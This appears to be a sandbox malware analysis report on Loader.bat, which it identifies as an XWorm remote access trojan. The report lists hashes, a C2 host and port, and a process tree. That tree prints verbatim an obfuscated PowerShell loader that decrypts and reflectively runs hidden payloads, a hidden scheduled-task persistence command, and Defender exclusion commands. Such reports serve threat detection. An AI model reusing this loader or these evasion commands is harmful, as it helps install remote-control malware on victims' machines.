Analysis

  • max time kernel
    1595s
  • max time network
    1604s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-04-2024 23:44

General

  • Target

    Loader.bat

  • Size

    289KB

  • MD5

    15a31e6b43cde7114b2205ce0a38123a

  • SHA1

    1fccd0820d54edb0e8d0f532e8ffd1c024f234d4

  • SHA256

    4570f682c283ce929e8e43642522440b9b874ea605cb2e14b53ec4296631e090

  • SHA512

    af8b38caa5c62b83f8060af340a27b3c2285f5e8d21cc6868c5289575bd4e5b6c1ff9aed888293d1cbf87011ba82d2a5ced0ff27b3c296cdabcc4b333e9453e5

  • SSDEEP

    6144:E9qvCM2ntB9heJgUPXRNzufWQBxm8VaKC/w91wskhkIp26QuI6ZBEu6:zInFheJxzzpeCo9uhkWD26Uj

Malware Config

Extracted

Family

xworm

C2

looking-memphis.gl.at.ply.gg:45119

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    winhelper.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:1272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2zT4oddNyOy8xUx/N5qsjXNWtcSidQa1mGBJTMFNSlI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHYQWFuEA6L5vyUWCNzFaQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ruvpy=New-Object System.IO.MemoryStream(,$param_var); $WKiPK=New-Object System.IO.MemoryStream; $aVbnN=New-Object System.IO.Compression.GZipStream($ruvpy, [IO.Compression.CompressionMode]::Decompress); $aVbnN.CopyTo($WKiPK); $aVbnN.Dispose(); $ruvpy.Dispose(); $WKiPK.Dispose(); $WKiPK.ToArray();}function execute_function($param_var,$param2_var){ $cYwXc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OwAMD=$cYwXc.EntryPoint; $OwAMD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$IQAYo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Loader.bat').Split([Environment]::NewLine);foreach ($iybba in $IQAYo) { if ($iybba.StartsWith(':: ')) { $xIAwp=$iybba.Substring(3); break; }}$payloads_var=[string[]]$xIAwp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_967_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_967.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3016
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_967.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3528
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_967.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4504
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3640
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:1364
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2zT4oddNyOy8xUx/N5qsjXNWtcSidQa1mGBJTMFNSlI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHYQWFuEA6L5vyUWCNzFaQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ruvpy=New-Object System.IO.MemoryStream(,$param_var); $WKiPK=New-Object System.IO.MemoryStream; $aVbnN=New-Object System.IO.Compression.GZipStream($ruvpy, [IO.Compression.CompressionMode]::Decompress); $aVbnN.CopyTo($WKiPK); $aVbnN.Dispose(); $ruvpy.Dispose(); $WKiPK.Dispose(); $WKiPK.ToArray();}function execute_function($param_var,$param2_var){ $cYwXc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OwAMD=$cYwXc.EntryPoint; $OwAMD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_967.bat';$IQAYo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_967.bat').Split([Environment]::NewLine);foreach ($iybba in $IQAYo) { if ($iybba.StartsWith(':: ')) { $xIAwp=$iybba.Substring(3); break; }}$payloads_var=[string[]]$xIAwp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4948
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4684
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1060
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\winhelper.exe'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:752
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winhelper.exe'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4920

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        f8d49a4af7a844bfc7247d5670def557

        SHA1

        26ae0ce194a77a7a1887cf93741293fdfa6c94c4

        SHA256

        61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

        SHA512

        9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        dbb22d95851b93abf2afe8fb96a8e544

        SHA1

        920ec5fdb323537bcf78f7e29a4fc274e657f7a4

        SHA256

        e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

        SHA512

        16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        ba169f4dcbbf147fe78ef0061a95e83b

        SHA1

        92a571a6eef49fff666e0f62a3545bcd1cdcda67

        SHA256

        5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

        SHA512

        8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44u1v0to.bcl.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\startup_str_967.bat

        Filesize

        289KB

        MD5

        15a31e6b43cde7114b2205ce0a38123a

        SHA1

        1fccd0820d54edb0e8d0f532e8ffd1c024f234d4

        SHA256

        4570f682c283ce929e8e43642522440b9b874ea605cb2e14b53ec4296631e090

        SHA512

        af8b38caa5c62b83f8060af340a27b3c2285f5e8d21cc6868c5289575bd4e5b6c1ff9aed888293d1cbf87011ba82d2a5ced0ff27b3c296cdabcc4b333e9453e5

      • C:\Users\Admin\AppData\Roaming\startup_str_967.vbs

        Filesize

        115B

        MD5

        9078fa50c3b02d5492ba016d9e2595fd

        SHA1

        55c063ce344874391d7f2486928ab3c2d4bafbf4

        SHA256

        c565686c790893e19ecb7aac696ea88f88852b1995e9f3c0c21b97950cf57197

        SHA512

        d7142204a6b658472a49ae0b6c0f6759fa32946f32cd198a361092fb400da2ef37da46f6d6c6bea9788b6e5ba8c89f890d3bbc52eb70652f4d1b589ce03834ce

      • memory/788-11-0x00000173D7EF0000-0x00000173D7F00000-memory.dmp

        Filesize

        64KB

      • memory/788-14-0x00000173F0630000-0x00000173F0668000-memory.dmp

        Filesize

        224KB

      • memory/788-0-0x00000173F03E0000-0x00000173F0402000-memory.dmp

        Filesize

        136KB

      • memory/788-13-0x00000173F03D0000-0x00000173F03D8000-memory.dmp

        Filesize

        32KB

      • memory/788-10-0x00007FFE3D290000-0x00007FFE3DD51000-memory.dmp

        Filesize

        10.8MB

      • memory/788-50-0x00007FFE3D290000-0x00007FFE3DD51000-memory.dmp

        Filesize

        10.8MB

      • memory/788-12-0x00000173D7EF0000-0x00000173D7F00000-memory.dmp

        Filesize

        64KB

      • memory/3016-30-0x00007FFE3D290000-0x00007FFE3DD51000-memory.dmp

        Filesize

        10.8MB

      • memory/3016-16-0x00007FFE3D290000-0x00007FFE3DD51000-memory.dmp

        Filesize

        10.8MB

      • memory/3016-17-0x00000260A2C50000-0x00000260A2C60000-memory.dmp

        Filesize

        64KB

      • memory/3016-18-0x00000260A2C50000-0x00000260A2C60000-memory.dmp

        Filesize

        64KB

      • memory/4948-49-0x000001B0EE080000-0x000001B0EE096000-memory.dmp

        Filesize

        88KB